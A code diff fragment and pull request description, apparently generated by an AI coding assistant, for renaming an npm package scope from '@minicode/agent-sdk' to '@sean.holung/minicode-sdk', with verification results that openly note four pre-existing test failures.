-import type { ToolDefinition } from "@minicode/agent-sdk";
+import { ToolRegistry } from "@sean.holung/minicode-sdk";
+import type { ToolDefinition } from "@sean.holung/minicode-sdk";
 
 const echoTool: ToolDefinition = {
   name: "echo",


### PR DESCRIPTION
## Summary

The `@minicode` npm scope is owned by an unrelated user, so `publish-sdk` can't claim it (`E404 — '@minicode/agent-sdk@0.0.1' is not in this registry`). Switching to the existing `@sean.holung` scope, which already hosts the CLI as `@sean.holung/minicode`.

Going with **`@sean.holung/minicode-sdk`** rather than the longer `minicode-agent-sdk` — "agent" is implied for an SDK in this codebase, and it matches the conventional `<project>-sdk` shape (cf. `aws-sdk`, `firebase-sdk`).

## What changed

Mechanical rename across 51 files, 96 references. No semantic changes.

- `@minicode/agent-sdk` → `@sean.holung/minicode-sdk` everywhere — `package.json` files, all source imports, README/docs, the `publish-sdk.yml` smoke-test, root `bundleDependencies`/`dependencies`, `minicode-plugin-python` peer dep.
- Workspace **directory** stays at `packages/agent-sdk/` — the internal path doesn't need to mirror the npm name, and renaming the directory would touch every git history reference.
- `npm install` refreshes the symlink at `node_modules/@sean.holung/minicode-sdk → packages/agent-sdk`, so the CLI continues to use the local bytes via npm's workspace resolution. Bundled-publish of the CLI is unchanged.

## Verification

- `npm pack` (dry-run) reports name `@sean.holung/minicode-sdk`, tarball **75.7 kB / 79 files** (unchanged from before the rename).
- Both root and workspace lints clean.
- Tests: **697/701 pass** — same 4 pre-existing `workspace-changes` git-env failures as on main.

After merge, re-running the `publish-sdk` workflow should publish to `@sean.holung/minicode-sdk` successfully (since you already own the `@sean.holung` scope on npmjs.com).

https://claude.ai/code/session_012ajRQHucZRbcE39L9E75nw

---
_Generated by [Claude Code](https://claude.ai/code/session_012ajRQHucZRbcE39L9E75nw)_